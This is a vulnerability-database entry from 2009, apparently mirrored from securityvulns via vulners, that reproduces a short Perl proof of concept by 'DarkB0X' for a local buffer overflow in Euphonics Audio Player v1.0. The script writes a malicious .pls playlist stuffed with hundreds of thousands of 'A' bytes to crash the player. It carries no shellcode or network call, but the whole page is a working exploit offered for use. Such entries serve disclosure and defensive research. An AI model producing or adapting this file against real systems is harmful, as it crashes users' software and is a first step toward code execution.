Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:21297
HistoryFeb 05, 2009 - 12:00 a.m.

Euphonics Audio Player v1.0 (.pls) Local BOF POC

2009-02-0500:00:00
vulners.com
12

#!/usr/bin/perl -w
#By DarkB0X
#HomePage : http://NullArea.Net
#contact : [email protected]

my $file="dark.pls";

$accessviolation = "\x41\x41\x41\x41" x 408973 ;
open(my $FILE, ">>$file") or die "Cannot open $file: $!";
print $FILE $accessviolation ;
close($FILE);
print "$file creation finished";